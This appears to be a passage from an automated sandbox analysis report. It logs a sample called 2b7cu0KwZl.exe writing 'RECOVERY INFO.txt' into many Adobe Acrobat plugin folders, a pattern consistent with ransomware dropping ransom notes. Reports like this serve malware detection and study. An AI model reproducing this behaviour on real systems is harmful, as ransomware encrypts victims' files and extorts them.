Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\it-it\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\ja-jp\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\ko-kr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\nb-no\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\nl-nl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\pl-pl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\pt-br\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\ro-ro\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\root\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\ru-ru\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\sk-sk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\sl-si\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\sv-se\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\tr-tr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\uk-ua\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\zh-cn\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\zh-tw\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\nls\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\app-center\js\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\css\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\images\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ca-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\cs-cz\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\da-dk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\de-de\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\en-ae\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\en-il\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\es-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\eu-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fi-fi\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fr-fr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\fr-ma\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hr-hr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hu-hu\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\it-it\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ja-jp\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ko-kr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nb-no\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nl-nl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pl-pl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\pt-br\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ro-ro\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\root\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\ru-ru\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sk-sk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sl-si\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\sv-se\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\tr-tr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\uk-ua\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-cn\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\zh-tw\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\plugins\rhp\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\combinepdf\js\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\css\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\themes\dark\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\images\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ca-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\cs-cz\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\da-dk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\de-de\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-ae\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\en-il\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\es-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\eu-es\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fi-fi\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fr-fr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\fr-ma\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\hr-hr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\hu-hu\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\it-it\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ja-jp\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ko-kr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\nb-no\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\nl-nl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\pl-pl\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\pt-br\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ro-ro\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\root\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ru-ru\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sk-sk\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sl-si\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sv-se\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\tr-tr\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\uk-ua\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\zh-cn\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\zh-tw\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\plugins\rhp\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exeDirectory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\RECOVERY INFO.txtJump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\dc-annotations\js\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\css\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ca-es\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\cs-cz\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\da-dk\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\de-de\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-ae\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-gb\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-il\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\es-es\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\eu-es\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fi-fi\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fr-fr\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\fr-ma\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\hr-hr\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\hu-hu\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\it-it\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ja-jp\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ko-kr\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\nb-no\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\nl-nl\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\pl-pl\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\pt-br\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ro-ro\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\root\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\ru-ru\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sk-sk\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sl-si\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\sv-se\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\tr-tr\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\uk-ua\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\zh-cn\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\zh-tw\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\css\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\desktop-connector-files-select\js\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\css\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\RECOVERY INFO.txt
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe, Directory created: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\digsig\images\RECOVERY INFO.txt
